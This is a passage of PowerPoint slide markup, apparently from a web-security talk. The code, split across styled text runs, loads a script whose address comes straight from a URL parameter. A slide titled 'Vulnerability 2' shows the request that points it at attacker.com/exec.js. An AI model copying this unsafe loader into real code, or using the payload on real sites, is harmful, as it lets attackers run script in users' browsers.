                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4EC9B0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>URLSearchParams</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>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window</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>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location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>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search</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4FC1FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>source</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4FC1FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>urlParams</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'source'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>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document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>createElement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"script"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>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src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4FC1FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>source</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4FC1FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>head</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>appendChild</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CCCCCC"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// […]</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2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477745692"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>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51BEFF-4FFE-C07E-328F-D8B426FF8ACE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="828673" y="3928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7900"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Vulnerability 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB62E7CC-7B76-B4A3-2081-CED04FC2A094}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="510986" y="2000851"/>
            <a:ext cx="11170023" cy="3477875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>secret.php?source</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>https://attacker.com/exec.js</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="808080"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// […]</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="808080"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>defer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nonce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"ceT7vflNlU8YT58gnQnZH4xi"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CCCCCC"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4FC1FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>urlParams</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4EC9B0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>URLSearchParams</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>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window</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>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location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>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search</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4FC1FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>source</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4FC1FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>urlParams</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
